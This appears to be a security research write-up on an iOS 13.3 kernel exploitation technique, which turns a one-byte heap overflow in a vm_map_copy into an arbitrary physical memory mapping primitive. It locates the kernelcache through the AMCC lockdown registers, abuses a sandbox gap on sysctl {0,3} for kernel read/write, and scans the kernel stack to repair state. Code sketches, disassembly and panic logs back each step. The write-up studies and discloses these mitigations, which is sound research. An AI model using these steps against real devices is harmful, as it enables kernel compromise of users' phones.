Thus, our corrupted vm_map_copy object actually gives us an incredibly powerful primitive: mapping arbitrary physical memory directly into our process in userspace!


An old friend

I decided to build the POC for the vm_map_copy physical memory mapping technique on top of the kernel read/write primitive provided by the oob_timestamp exploit for iOS 13.3. There were two primary reasons for this.

First, I did not have a good bug available to develop a complete exploit with it. Even though I had initially stumbled upon the idea while trying to exploit the oob_timestamp bug, it quickly became apparent that that bug wasn't a good fit for this technique.

Second, I wanted to evaluate the technique independently of the vulnerability or vulnerabilities used to achieve it. It seemed that there was a good chance that the technique could be made deterministic (that is, without a failure case); implementing it on top of an unreliable vulnerability would make it hard to evaluate separately.

This technique most naturally fits a controlled one-byte linear heap overflow in any of the allocator zones kalloc.80 through kalloc.32768 (i.e., general-purpose allocations of between 65 and 32768 bytes). For ease of reference in the rest of this post, I'll simply call it the one-byte exploit technique.

Leaving the Shire

We've already laid out the bones of the technique above: create a vm_map_copy of type KERNEL_BUFFER containing a pointer to a fake vm_map_entry list, corrupt the type to ENTRY_LIST, receive it with vm_map_copyout_internal(), and get arbitrary physical memory mapped into our address space. However, successful exploitation is a little bit more complicated:

  1. We still have not addressed where this fake vm_map_entry/vm_object/vm_page hierarchy will be constructed.
  2. We need to ensure that the kernel thread that calls vm_map_copyout_internal() does not crash, panic, or deadlock after mapping the physical page.
  3. Mapping one physical page is great, but probably not sufficient by itself to achieve arbitrary kernel read/write. This is because:

    1. The kernelcache's exact load address in physical memory is unknown, so we cannot map any specific page of it directly without locating it first.
    2. It is possible that some hardware device exposes an MMIO interface that is powerful enough by itself to build some sort of read/write primitive; however, I'm not aware of any such component.

    Thus, we will need to map more than one physical address, and most likely we will need to use data read from one mapping to find the physical address to use for another. This means our mapping primitive cannot be one-shot.

  4. The call to vm_map_copy_insert() after the for loop tries to zfree() the vm_map_copy to the vm_map_copy_zone. This will panic given a vm_map_copy originally of type KERNEL_BUFFER, since KERNEL_BUFFER objects are initially allocated using kalloc().

    Thus, the only way to safely break out of the for loop and resume normal operation is to first get kernel read/write and then patch up state in the kernel to prevent this panic.

These constraints will guide the course of this exploit technique.

A short cut to PAN

An important prerequisite for the one-byte technique is to create a fake vm_map_entry object hierarchy at a known address. Since we are already building this POC on oob_timestamp, I decided to leverage a neat trick I picked up while exploiting that bug. In the real world, another vulnerability in addition to the one-byte overflow might be needed to leak a kernel address.

While developing the POC for oob_timestamp, I learned that the AGXAccelerator kernel extension provides a very interesting primitive: IOAccelSharedUserClient2 and IOAccelCommandQueue2 together allow the creation of large regions of pageable memory shared between userspace and the kernel. Having access to user/kernel shared memory can be extremely helpful when developing exploits, since you can place fake kernel data structures there and manipulate them while the kernel accesses them. Of course, this AGXAccelerator primitive is not the only way to get kernel/user shared memory; the physmap, for example, also maps most of DRAM into virtual memory, so it can also be used to reflect userspace memory contents into the kernel. However, the AGXAccelerator primitive is often much more convenient in practice: for one, it provides a very large contiguous shared memory region in a much more constrained address range; and for two, it's easier to leak addresses of adjacent objects to locate it.

Now, before the iPhone 7, iOS devices did not support the Privileged Access Never (PAN) security feature. This meant that all of userspace was effectively shared memory with the kernel, and you could just overwrite pointers in the kernel to point to fake data structures in userspace.

However, modern iOS devices enable PAN, so attempts by the kernel to directly access userspace memory will fault. This is what makes the existence of the AGXAccelerator shared memory primitive so useful: if you can establish a large shared memory region and learn its address in the kernel, that's basically equivalent to having PAN turned off.

Of course, a key part of that sentence is "and learn its address in the kernel"; doing that usually requires a vulnerability and some effort. Instead, as we already rely on oob_timestamp, we will simply hardcode the shared memory address and note that finding the address dynamically is left as an exercise for the reader.

At the sign of the panicking POC

With kernel read/write and a user/kernel shared memory buffer in hand, we are ready to write the POC. The overall flow of the exploit is essentially what was outlined above.

We start by creating the shared memory region in the kernel.

We initialize a fake vm_map_entry list inside the shared memory. The entry list contains 3 entries: a "ready" entry, a "mapping" entry, and a "done" entry. Together these entries will represent the current state of each mapping operation.



We send an out-of-line memory descriptor containing a fake vm_map_header in a Mach message to a holding port. The out-of-line memory is stored in the kernel as a vm_map_copy object of type KERNEL_BUFFER (value 3).



We simulate a one-byte linear heap overflow that corrupts the type field of the vm_map_copy, changing it to ENTRY_LIST (value 1).



We start a thread that receives the Mach message queued on the holding port. This triggers a call to vm_map_copyout_internal() on the corrupted vm_map_copy.

Due to the way the vm_map_entry list was initially configured, the vm_map_copyout thread will spin in an infinite loop on the "done" entry, ready for us to manipulate it.



At this point, we have a kernel thread that is spinning ready to map any physical page we request.

To map a page, we first set the "ready" entry to link to itself, and then set the "done" entry to link to the "ready" entry. This will cause the vm_map_copyout thread to spin on "ready".



While spinning on "ready", we mark the "mapping" entry as wired with a single physical page and link it to the "done" entry, which we link to itself. We also populate the fake vm_object and vm_page to map the desired physical page number.



Then, we can perform the mapping by linking the "ready" entry to the "mapping" entry. vm_map_copyout_internal() will map in the page and then spin on the "done" entry, signaling completion.



This gives us a reusable primitive that maps arbitrary physical addresses into our process. As an initial proof of concept, I mapped the non-existent physical address 0x414140000 and tried to read from it, triggering an LLC bus error from EL0:
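The handshake can be modeled in a few lines of C; this is a userspace toy with simplified structures, not the actual kernel interaction, but it shows how relinking entries steers the walker:

#include <stdio.h>

/* A toy model of the three-entry protocol: the walker follows next pointers
 * the way vm_map_copyout_internal() walks vme_next, and "userspace" requests
 * work by relinking the entries it controls. */
struct entry { struct entry *next; int wired; const char *name; };

int main(void) {
    struct entry ready   = { 0, 0, "ready" };
    struct entry mapping = { 0, 1, "mapping" };  /* wired: requests a mapping */
    struct entry done    = { 0, 0, "done" };

    /* Request one mapping: ready -> mapping -> done, with done self-linked
     * so the walker would spin there waiting for the next request. */
    ready.next = &mapping;
    mapping.next = &done;
    done.next = &done;

    for (struct entry *e = &ready; ; e = e->next) {
        if (e->wired)
            printf("wired entry '%s': fault in the requested page\n", e->name);
        if (e == e->next) {  /* self-linked entry: the walker would spin */
            printf("spinning on '%s'\n", e->name);
            break;           /* the real kernel thread loops here forever */
        }
    }
    return 0;
}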


The mines of memory

At this point we have proved that the mapping primitive is sound, but we still don't know what to do with it.

My first thought was that the easiest approach would be to go after the kernelcache image in memory. Note that on modern iPhones, even with a direct physical read/write primitive, KTRR prevents us from modifying the locked down portions of the kernel image, so we can't just patch the kernel's executable code. However, certain segments of the kernelcache image remain writable at runtime, including the part of the __DATA segment that contains sysctls. Since sysctls have been (ab)used before to build read/write primitives, this felt like a stable path forward.

The challenge was then to use the mapping primitive to locate the kernelcache in physical memory, so that the sysctl structs could then be mapped into userspace and modified.

But first, before we figure out how to locate the kernelcache, some background on physical memory on the iPhone 11 Pro.

The iPhone 11 Pro has 4 GB of DRAM based at physical address 0x800000000, so physical DRAM addresses span 0x800000000 to 0x900000000. Of this, the range 0x801b80000 to 0x8ec9b4000 is reserved for the Application Processor (AP), the main processor of the phone which runs the XNU kernel and applications. Memory outside this region is reserved for coprocessors like the Always On Processor (AOP), Apple Neural Engine (ANE), SIO (possibly Apple SmartIO), AVE, ISP, IOP, etc. The addresses of these and other regions can be found by parsing the devicetree or by dumping the iboot-handoff region at the start of DRAM.



At boot time, the kernelcache is loaded contiguously into physical memory, which means that finding a single kernelcache page is sufficient to locate the whole image. Also, while KASLR may slide the kernelcache by a large amount in virtual memory, the load address in physical memory is quite constrained: in my testing, the kernel header was always loaded at an address between 0x805000000 and 0x807000000, a range of just 32 MB.

As it turns out, this range is smaller than the kernelcache itself, which spans 0x23d4000 bytes, or 35.8 MB. Thus, we can be certain at runtime that the address 0x807000000 contains a kernelcache page.
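A quick arithmetic check of that claim, using the constants measured above:

#include <stdio.h>

int main(void) {
    unsigned long long base_lo = 0x805000000ULL;  /* lowest observed load address */
    unsigned long long size    = 0x23d4000ULL;    /* kernelcache size, ~35.8 MB */
    unsigned long long probe   = 0x807000000ULL;  /* candidate physical address */
    /* Worst case is the lowest base: the image must still extend past the
     * probe address. Higher bases only move the image closer to the probe. */
    printf("always covered: %s\n",
           (base_lo + size > probe) ? "yes" : "no");  /* prints "yes" */
    return 0;
}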

However, I quickly ran into panics when trying to map the kernelcache:

panic(cpu 4 caller 0xfffffff0156f0c98): "pmap_enter_options_internal: page belongs to PPL, " "pmap=0xfffffff031a581d0, v=0x3bb844000, pn=2103160, prot=0x3, fault_type=0x3, flags=0x0, wired=1, options=0x1"

This panic string purports to come from the function pmap_enter_options_internal(), which is in the open-source part of XNU (osfmk/arm/pmap.c), and yet the panic is not present in the sources. Thus, I reversed the version of pmap_enter_options_internal() in the kernelcache to figure out what was happening.

The issue, I learned, is that the specific page I was trying to map was part of Apple's Page Protection Layer (PPL), a portion of the XNU kernel that manages page tables and that is considered even more privileged than the rest of the kernel. The goal of PPL is to prevent an attacker from modifying protected pages (in particular, executable code pages for codesigned binaries) even after compromising the kernel to obtain a read/write capability.

In order to enforce that protected pages cannot be modified, PPL must protect page tables and page table metadata. Thus, when I tried to map a PPL-protected page into userspace, it triggered a panic.

if (pa_test_bits(pa, 0x4000 /* PP_ATTR_PPL? */)) {
    panic("%s: page belongs to PPL, " ...);
}

if (pvh_get_flags(pai_to_pvh(pai)) & PVH_FLAG_LOCKDOWN) {
    panic("%s: page locked down, " ...);
}

The presence of PPL significantly complicates use of the physical mapping primitive, since trying to map a PPL-protected page will panic. And the kernelcache itself contains many PPL-protected pages, splitting the contiguous 35 MB binary into smaller PPL-free chunks that no longer bridge the physical slide of the kernelcache. Thus, there is no longer a single physical address we can (safely) map that is guaranteed to be a kernelcache page.

And the rest of the AP's DRAM region is an equally treacherous minefield. Physical pages are grabbed for use by PPL and returned to the kernel as-needed, and so at runtime PPL pages are scattered throughout physical memory like mines. Thus, there is no static address anywhere that is guaranteed not to blow up.

A map showing the protection flags on every page of AP DRAM on the A13 over time. Yellow is PPL+LOCKDOWN, red is PPL, green is LOCKDOWN, and blue is unguarded (i.e., mappable).

II - The Two Techniques

The road to DRAM's guard

Yet, that's not quite true. The Application Processor's DRAM region might be a minefield, but anything outside of it is not. That includes the DRAM used by coprocessors and also any other addressable components of the system, such as hardware registers for system components that are typically accessed via memory-mapped I/O (MMIO).

With such a powerful primitive, I expect that there are a plethora of techniques that could be used to build a read/write primitive. And I expect that there are many clever things that could be done by leveraging direct access to special hardware registers and coprocessors. Unfortunately, this is not an area with which I'm very familiar, so I'll just describe one (failed) attempt to bypass PPL here.

The idea I had was to take control of some coprocessor and use execution on both the coprocessor and the AP together to attack the kernel. First, we use the physical mapping primitive to modify the part of DRAM storing data for a coprocessor in order to get code execution on that coprocessor. Next, back on the main processor, we use the mapping primitive a second time to map and disable the coprocessor's Device Address Resolution Table, or DART (basically an IOMMU). With code execution on the coprocessor and the corresponding DART disabled, we have direct unguarded access from the coprocessor to physical memory, allowing us to completely sidestep the protections of PPL (which are only enforced from the AP).

However, whenever I tried to modify certain regions of DRAM used by coprocessors, I would get kernel panics. In particular, the region 0x800000000 - 0x801564000 appeared to be readonly:

panic(cpu 5 caller 0xfffffff0189fc598): "LLC Bus error from cpu1: FAR=0x16f507f10 LLC_ERR_STS/ADR/INF=0x11000ffc00000080/0x214000800000000/0x1 addr=0x800000000 cmd=0x14(acc_cifl2c_cmd_ncwr)"

panic(cpu 5 caller 0xfffffff020ca4598): "LLC Bus error from cpu1: FAR=0x15f03c000 LLC_ERR_STS/ADR/INF=0x11000ffc00000080/0x214030800104000/0x1 addr=0x800104000 cmd=0x14(acc_cifl2c_cmd_ncwr)"

panic(cpu 5 caller 0xfffffff02997c598): "LLC Bus error from cpu1: FAR=0x10a024000 LLC_ERR_STS/ADR/INF=0x11000ffc00000082/0x21400080154c000/0x1 addr=0x80154c000 cmd=0x14(acc_cifl2c_cmd_ncwr)"

This was very weird: these addresses are outside of the KTRR lockdown region, so nothing should be able to block writing to this part of DRAM with a physical mapping primitive! Thus, there must be some other undocumented lockdown enforced on this physical range.

On the other hand, the region 0x801564000 - 0x801b80000 remains writable as expected, and writing to different areas in this region produces odd system behaviors, supporting the theory that this is corrupting data used by coprocessors. For example, writing to some areas would cause the camera and flashlight to become unresponsive, while writing to other areas would cause the phone to panic when the mute slider was switched on.

To get a better sense of what might be happening, I identified the regions in this range by examining the devicetree and dumping memory. In the end, I discovered the following layout of coprocessor firmware segments in the range 0x800000000 - 0x801b80000:


Thus, the regions that are locked down are all __TEXT segments of coprocessor firmwares; this strongly suggests that Apple has added a new mitigation to make coprocessor __TEXT segments read-only in physical memory, similar to KTRR on the AMCC (probably Apple's memory controller) but for coprocessor firmwares instead of just the AP kernel. This might be the undocumented CTRR mitigation referenced in the originally published xnu-6153.41.3 sources that appears to be an enhanced replacement for KTRR on A12 and up; Ian Beer suggested CTRR might stand for Coprocessor Text Readonly Region.

Nevertheless, code execution on these coprocessors should still be viable: just as KTRR does not prevent exploitation on the AP, the coprocessor __TEXT lockdown mitigation does not prevent exploitation on coprocessors. So, even though this mitigation makes things more difficult, at this point our plan of disabling a DART and using code execution on the coprocessor to write to a PPL-protected physical address should still work.

The voice of PPL

What did turn out to be a roadblock however was the DART/IOMMU lockdown enforced by PPL on the Application Processor. At boot, XNU parses the "pmap-io-ranges" property in the devicetree to populate the io_attr_table array, which stores page attributes for certain physical I/O addresses. Then, when trying to map the physical address, pmap_enter_options_internal() checks the attributes to see if certain mappings should be disallowed:

wimg_bits = pmap_cache_attributes(pn); // checks io_attr_table
if ( flags )
    wimg_bits = wimg_bits & 0xFFFFFF00 | (u8)flags;
pte |= wimg_to_pte(wimg_bits);
if ( wimg_bits & 0x4000 )              // guarded I/O range
{
    // Only two xPRR permission encodings are permitted for these pages;
    // any other requested permission (e.g. a userspace mapping) panics.
    xprr_perm = (pte >> 4) & 0xC | (pte >> 53) & 1 | (pte >> 53) & 2;
    if ( xprr_perm == 0xB )
        pte_perm_bits = 0x20000000000080LL;
    else if ( xprr_perm == 3 )
        pte_perm_bits = 0x20000000000000LL;
    else
        panic("Unsupported xPRR perm ...");
    pte = pte_perm_bits | pte & ~0x600000000000C0uLL;
}
pmap_enter_pte(pmap, pte_p, pte, vaddr);

Thus, we can only map the DART's I/O address into our process if bit 0x4000 is clear in the wimg field. Unfortunately, a quick look at the "pmap-io-ranges" property in the devicetree confirmed that bit 0x4000 was set for every DART:

    addr         len        wimg     signature
0x620000000, 0x40000000,       0x27, 'PCIe'
0x2412C0000,     0x4000,     0x4007, 'DART' ; dart-sep
0x235004000,     0x4000,     0x4007, 'DART' ; dart-sio
0x24AC00000,     0x4000,     0x4007, 'DART' ; dart-aop
0x23B300000,     0x4000,     0x4007, 'DART' ; dart-pmp
0x239024000,     0x4000,     0x4007, 'DART' ; dart-usb
0x239028000,     0x4000,     0x4007, 'DART' ; dart-usb
0x267030000,     0x4000,     0x4007, 'DART' ; dart-ave
...
0x8FC3B4000,     0x4000, 0x40004016, 'GUAT' ; sgx.gfx-handoff-base

Thus, we cannot map the DART into userspace to disable it.

The palantír

Even though PPL prevents us from mapping page tables and DART I/O addresses, the physical I/O addresses for other hardware components are still mappable. Thus, it is still possible to map and read some system component's hardware registers to try and locate the kernel.

My initial attempt was to read from IORVBAR, the Reset Vector Base Address Register accessible via MMIO. The reset vector is the first piece of code that executes on a CPU after it resets; thus, reading IORVBAR would give us the physical address of XNU's reset vector, which would pinpoint the kernelcache in physical memory.

IORVBAR is mapped at offset 0x40000 after the "reg-private" address for each CPU in the devicetree; for example, on A13 CPU 0 it is located at physical address 0x210050000. It is part of the same group of register sets containing CoreSight and DBGWRAP that had been previously used to bypass KTRR. However, I found that IORVBAR is not accessible on A13: trying to read from it will panic.

I spent some time searching the A13 SecureROM for interesting physical addresses before Jann Horn suggested that I map the KTRR lockdown registers on the AMCC, Apple's memory controller. These registers store the physical memory bounds of the KTRR region in order to enforce the KTRR readonly region against attacks from coprocessors.



Mapping and reading the AMCC's RORGNBASEADDR register at physical address 0x200000680 worked like a charm, yielding the start address of the lockdown region containing the kernelcache in physical memory. Using security mitigations to break other security mitigations is fun. :)
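A minimal sketch of this step, where map_physical() is a hypothetical wrapper around the exploit's arbitrary physical mapping primitive; only the register's physical address comes from the devicetree, and treating it as a raw 64-bit read is an assumption:

#include <stddef.h>
#include <stdint.h>

#define PAGE_SIZE               0x4000ULL        /* 16K pages */
#define AMCC_RORGNBASEADDR_PA   0x200000680ULL   /* A13 */

/* Hypothetical wrapper around the arbitrary physical mapping primitive. */
extern volatile uint8_t *map_physical(uint64_t pa, size_t size);

/* Returns the start of the KTRR lockdown region, which contains the
 * kernelcache. The register's exact width/encoding is an assumption. */
uint64_t locate_kernelcache(void) {
    uint64_t page_pa = AMCC_RORGNBASEADDR_PA & ~(PAGE_SIZE - 1);
    volatile uint8_t *page = map_physical(page_pa, PAGE_SIZE);
    return *(volatile uint64_t *)(page + (AMCC_RORGNBASEADDR_PA & (PAGE_SIZE - 1)));
}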

The back gate is closed

After finding a definitive way forward using AMCC, I looked at one last possibility before giving up on bypassing PPL.

iOS is configured with 40-bit physical addresses and 16K pages (14 bits). Meanwhile, the arbitrary physical page number passed to pmap_enter_options_internal() is 32 bits, and is shifted by 14 and masked with 0xFFFF_FFFF_C000 when inserted into the level 3 translation table entry (L3 TTE). This means that we could control bits 45 - 14 of the TTE, even though bits 45 - 40 should always be zero based on the physical address size programmed in TCR_EL1.IPS.

If the hardware ignored the bits beyond the maximum supported physical address size, then we could bypass PPL by supplying a physical page number that exactly matches the DART I/O address or page table page, but with one of the high bits set. Having the high bits set would cause the mapped address to fail to match any of the addresses in "pmap-io-ranges", even though the TTE would map the same physical address. This would be neat as it would allow us to bypass PPL as a precursor to kernel read/write/execute, rather than the other way around.

Unfortunately, it turns out that the hardware does in fact check that TTE bits beyond the supported physical address size are zero. Thus, I went forward with the AMCC trick to locate the kernelcache instead.
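For concreteness, here is a small standalone sketch of the arithmetic behind this failed idea; the constants come from the discussion above, and the choice of dart-sep as the example target is mine:

#include <stdint.h>
#include <stdio.h>

#define PAGE_SHIFT   14                  /* 16K pages */
#define PA_BITS      40                  /* TCR_EL1.IPS: 40-bit physical addresses */
#define TTE_OA_MASK  0xFFFFFFFFC000ULL   /* output-address bits of an L3 TTE */

int main(void) {
    /* Target: the dart-sep DART registers from "pmap-io-ranges". */
    uint32_t pn = (uint32_t)(0x2412C0000ULL >> PAGE_SHIFT);
    /* Set a bit above the 40-bit physical address limit; bit 26 of the
     * 32-bit page number corresponds to PA bit 40. */
    uint32_t evil_pn = pn | (1u << (PA_BITS - PAGE_SHIFT));

    uint64_t oa = ((uint64_t)evil_pn << PAGE_SHIFT) & TTE_OA_MASK;
    /* oa = 0x102412C0000: no longer matches any "pmap-io-ranges" entry... */
    uint64_t truncated = oa & ((1ULL << PA_BITS) - 1);
    /* ...but if the MMU ignored bits above PA_BITS, it would still map
     * 0x2412C0000. In practice the hardware checks these bits are zero. */
    printf("TTE OA 0x%llx, if truncated 0x%llx\n",
           (unsigned long long)oa, (unsigned long long)truncated);
    return 0;
}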

The taming of sysctl

At this point, we have a physical read/write primitive for non-PPL physical addresses, and we know the address of the kernelcache in physical memory. The next step is to build a virtual read/write primitive.

I decided to stick with known techniques for this part: using the fact that the sysctl_oid tree used by the sysctl() syscall is stored in writable memory in the kernelcache to manipulate it and convert benign sysctls allowed by the app sandbox into kernel read/write primitives.

XNU inherited sysctls from FreeBSD; they provide access to certain kernel variables to userspace. For example, the "hw.l1dcachesize" readonly sysctl allows a process to determine the L1 data cache line size, while the "kern.securelevel" read/write sysctl controls the "system security level" used for some operations in the BSD portion of the kernel.

The sysctls are organized into a tree hierarchy, with each node in the tree represented by a sysctl_oid struct. Building a kernel read primitive is as simple as mapping the sysctl_oid struct for some sysctl that is readable in the app sandbox and changing the target variable pointer (oid_arg1) to point to the virtual address we want to read. Invoking the sysctl then reads that address.
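A minimal sketch of the read primitive, assuming hypothetical phys_write64() and kva_to_pa() helpers built on the physical mapping primitive (the physical slide being known from the AMCC trick), plus an assumed offset for oid_arg1 within struct sysctl_oid:

#include <stddef.h>
#include <stdint.h>
#include <sys/sysctl.h>

extern void     phys_write64(uint64_t pa, uint64_t value);  /* hypothetical */
extern uint64_t kva_to_pa(uint64_t kva);                    /* hypothetical */

#define OID_ARG1_OFFSET 0x20   /* offset of oid_arg1 in struct sysctl_oid; assumed */

/* Read kernel memory by retargeting a sandbox-readable sysctl, e.g.
 * hw.l1dcachesize, at the kernel virtual address we want to read. */
uint64_t kread(uint64_t l1dcachesize_oid_kva, uint64_t target_kva) {
    phys_write64(kva_to_pa(l1dcachesize_oid_kva + OID_ARG1_OFFSET), target_kva);
    uint64_t value = 0;
    size_t size = sizeof(value);   /* the oid's declared size may be smaller */
    sysctlbyname("hw.l1dcachesize", &value, &size, NULL, 0);
    return value;
}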



Using sysctls to build a write primitive is a bit more complicated, since no sysctls are listed as writable in the container sandbox profile. The ziVA exploit for iOS 10.3.1 worked around this by changing the oid_handler field of the sysctl to call copyin(). However, on PAC-enabled devices like the A13, oid_handler is protected with a PAC, meaning that we cannot change its value.

However, when disassembling the function hook_system_check_sysctlbyname() that implements the sandbox check for the sysctl() system call, I noticed an interesting undocumented behavior:

// Sandbox check sysctl-read
ret = sb_evaluate(sandbox, 116u, &context);
if ( !ret )
{
    // Sandbox check sysctl-write
    if ( newlen | newptr && (namelen != 2 || name[0] != 0 || name[1] != 3) )
        ret = sb_evaluate(sandbox, 117u, &context);
    else
        ret = 0;
}

For some reason, if the sysctl node is deemed readable inside the sandbox, then the write check is not performed on the specific sysctl node { 0, 3 }! What this means is that { 0, 3 } will be writable in every sandbox from which it is readable, regardless of whether or not the sandbox profile allows writes to that sysctl.

As it turns out, the name of the sysctl { 0, 3 } is "sysctl.name2mib", a writable sysctl used to convert the string name of a sysctl into its numeric form, which is faster to look up. It is used to implement sysctlnametomib(), so it makes sense that this sysctl should usually be writable.
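This is easy to see from how sysctlnametomib() itself invokes { 0, 3 }: the name goes in as the "new" value, so from the sandbox hook's perspective the call is a write. A minimal sketch:

#include <string.h>
#include <sys/sysctl.h>

/* Convert a sysctl name to its numeric MIB via { 0, 3 }: the name is
 * passed as the "new" value and the MIB array comes back as the "old"
 * value. */
int name_to_mib(const char *name, int *mib, size_t *miblen) {
    int name2mib[2] = { 0, 3 };
    size_t oldlen = *miblen * sizeof(int);
    int ret = sysctl(name2mib, 2, mib, &oldlen, (void *)name, strlen(name));
    *miblen = oldlen / sizeof(int);
    return ret;
}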

The upshot is that even though there are no writable sysctls specified in the sandbox profile, sysctl { 0, 3 } is in fact writable anyway, allowing us to build a virtual write primitive alongside our read primitive. Thus, we now have full arbitrary kernel read/write.

III - The Return of the Copyout

The battle of pmap fields

We have come far, but the journey is not yet done: we must break the ring. As things stand, vm_map_copyout_internal() is spinning in an infinite loop on the "done" vm_map_entry, whose vme_next pointer points to itself. We must guide the safe return of this function to preserve the stability of the system.



There are two basic issues preventing this. First, because we've inserted entries into our page tables at the pmap layer without creating corresponding virtual entries at the vm_map layer, there is currently an accounting conflict between the pmap and vm_map views of our address space. This will cause a panic on process exit if not addressed. Second, once the loop is broken, vm_map_copyout_internal() has a call to vm_map_copy_insert() that will panic trying to free the corrupted vm_map_copy to the wrong zone.

We will address the pmap/vm_map conflict first.

Suppose for the moment that we were able to break out of the for loop and allow vm_map_copyout_internal() to return. The call to vm_map_copy_insert() that occurs after the for loop walks through all the entries in the vm_map_copy, unlinks them from the vm_map_copy's entry list, and links them into the vm_map's entry list instead.

static void
vm_map_copy_insert(
    vm_map_t        map,
    vm_map_entry_t  after_where,
    vm_map_copy_t   copy)
{
    vm_map_entry_t  entry;

    while (vm_map_copy_first_entry(copy) !=
               vm_map_copy_to_entry(copy)) {
        entry = vm_map_copy_first_entry(copy);
        vm_map_copy_entry_unlink(copy, entry);
        vm_map_store_entry_link(map, after_where, entry,
            VM_MAP_KERNEL_FLAGS_NONE);
        after_where = entry;
    }
    zfree(vm_map_copy_zone, copy);
}

Since the vm_map_copy's vm_map_entrys are all fake objects residing in shared memory, we really do not want them linked into our vm_map's entry list, where they will be freed on process exit. The simplest solution is thus to update the corrupted vm_map_copy's entry list so that it appears to be empty.

Forcing the vm_map_copy's entry list to appear empty certainly lets us safely return from vm_map_copyout_internal(), but we would nevertheless still get a panic once our process exits:

panic(cpu 3 caller 0xfffffff01f4b1c50): "pmap_tte_deallocate(): pmap=0xfffffff06cd8fd10 ttep=0xfffffff0a90d0408 ptd=0xfffffff132fc3ca0 refcnt=0x2 \n"

The issue is that during the course of the exploit, our mapping primitive forces pmap_enter_options() to insert level 3 translation table entries (L3 TTEs) into our process's page tables, but the corresponding accounting at the vm_map layer never happens. This disagreement between the pmap and vm_map views matters because the pmap layer requires that all physical mappings be explicitly removed before the pmap can be destroyed, and the vm_map layer will not know to remove a physical mapping if there is no vm_map_entry describing the corresponding virtual mapping.

Due to PPL, we cannot update the pmap directly, so the simplest solution is to grab a pointer to a legitimate vm_map_entry with faulted-in pages and overlay it on top of the virtual address range at which pmap_enter_options() established our physical mappings. Thus we will update the corrupted vm_map_copy's entry list so that it points to this single "overlay" entry instead.

The fires of stack doom

Finally, it is time to break vm_map_copyout_internal() out of the for loop.

    for (entry = vm_map_copy_first_entry(copy);
        entry != vm_map_copy_to_entry(copy);
        entry = entry->vme_next) {

The macro vm_map_copy_to_entry(copy) expands to:

    (struct vm_map_entry *)(&copy->c_u.hdr.links)

Thus, in order to break out of the loop, we need to process a vm_map_entry with vme_next pointing to the address of the c_u.hdr.links field in the corrupted vm_map_copy originally passed to this function.

The function is currently spinning on the "done" vm_map_entry, and we need to link in one final "overlay" vm_map_entry to address the pmap/vm_map accounting issue anyway. So the simplest way to break the loop is to modify the "overlay" entry's vme_next to point to &copy->c_u.hdr.links, and then update the "done" entry's vme_next to point to the overlay entry.
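With the virtual read/write primitive, this is just two pointer writes. A sketch, where kwrite64() is a hypothetical helper and the structure offsets are assumptions:

#include <stdint.h>

extern void kwrite64(uint64_t kva, uint64_t value);   /* hypothetical */

#define VME_NEXT_OFFSET   0x08  /* offset of vme_next in struct vm_map_entry; assumed */
#define COPY_LINKS_OFFSET 0x10  /* offset of c_u.hdr.links in struct vm_map_copy; assumed */

void break_copyout_loop(uint64_t copy, uint64_t done_entry, uint64_t overlay_entry) {
    /* Make the overlay entry the final entry in the list... */
    kwrite64(overlay_entry + VME_NEXT_OFFSET, copy + COPY_LINKS_OFFSET);
    /* ...then route the spinning "done" entry to the overlay entry. */
    kwrite64(done_entry + VME_NEXT_OFFSET, overlay_entry);
}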



The problem is the call to vm_map_copy_insert() mentioned earlier, which frees the vm_map_copy as if it were of type ENTRY_LIST:

    zfree(vm_map_copy_zone, copy);

However, the object passed to zfree() is our corrupted vm_map_copy, which was allocated with kalloc(); trying to free it to the vm_map_copy_zone will panic. Thus, we somehow need to ensure that a different, legitimate vm_map_copy object gets passed to the zfree() instead.

Fortunately, if you check the disassembly of vm_map_copyout_internal(), the vm_map_copy pointer is spilled to the stack for the duration of the for loop!

FFFFFFF007C599A4     STR     X28, [SP,#0xF0+copy]    ; spill the vm_map_copy pointer
FFFFFFF007C599A8     LDR     X25, [X28,#vm_map_copy.links.next]
FFFFFFF007C599AC     CMP     X25, X27
FFFFFFF007C599B0     B.EQ    loc_FFFFFFF007C59B98
...                             ; The for loop
FFFFFFF007C59B98     LDP     X9, X19, [SP,#0xF0+dst_addr] ; reload dst_addr and copy
FFFFFFF007C59B9C     LDR     X8, [X19,#vm_map_copy.offset]

This makes it easy to ensure that the pointer passed to zfree() is a legitimate vm_map_copy allocated from the vm_map_copy_zone: just scan the kernel stack of the vm_map_copyout_internal() thread while it's still spinning and swap any pointers to the corrupted vm_map_copy with the legitimate one.
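A minimal sketch of that scan, assuming hypothetical kread64()/kwrite64() virtual read/write helpers and that the spinning thread's kernel stack bounds have already been located:

#include <stdint.h>

extern uint64_t kread64(uint64_t kva);                  /* hypothetical */
extern void     kwrite64(uint64_t kva, uint64_t value); /* hypothetical */

void swap_spilled_copy_pointers(uint64_t stack_bottom, uint64_t stack_top,
                                uint64_t bad_copy, uint64_t good_copy) {
    /* Walk the spinning thread's kernel stack one 8-byte slot at a time. */
    for (uint64_t slot = stack_bottom; slot < stack_top; slot += 8) {
        if (kread64(slot) == bad_copy)
            kwrite64(slot, good_copy);   /* zfree() now gets the legit copy */
    }
}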



At last, we have fixed up the state enough to allow vm_map_copyout_internal() to break the loop and return safely.

Homeward bound

Finally, with a virtual kernel read/write primitive and the vm_map_copyout_internal() thread safely returned, we have achieved our goal: a stable kernel compromise achieved by turning a one-byte controlled heap overflow directly into an arbitrary physical address mapping primitive.

Or rather, a nearly-arbitrary physical address mapping primitive. As we have seen, PPL-protected addresses like page table pages and DARTs cannot be mapped using this technique.

When I started on this journey, I had intended to demonstrate that the conventional approach of going after the kernel task port was both unnecessary and limiting, that other kernel read/write techniques could be equally powerful. I suspected that the introduction of Mach-port based techniques in iOS 10 had biased the sample of publicly-disclosed exploits in favor of Mach-port oriented vulnerabilities, and that this in turn obscured other techniques that were just as promising but publicly less well understood.

The one-byte technique initially seemed to offer a counterpoint to the mainstream exploit flow. After reading the code in vm_map.c and pmap.c, I had expected to be able to simply map all of DRAM into my address space and then implement kernel read/write by performing manual page table walks using those mappings. But it turned out that PPL blocks this technique on modern iOS by preventing certain pages from being mapped at all.

It's interesting to note that similar research was touched upon years ago as well, back when such a thing would have worked. While doing background research for this blog post, I came across a presentation by Azimuth called iOS 6 Kernel Security: A Hacker’s Guide that introduced no fewer than four separate primitives that could be constructed by corrupting various fields of vm_map_copy_t: an adjacent memory disclosure, an arbitrary memory disclosure, an extended heap overflow, and a combined address disclosure and heap overflow at the disclosed address.



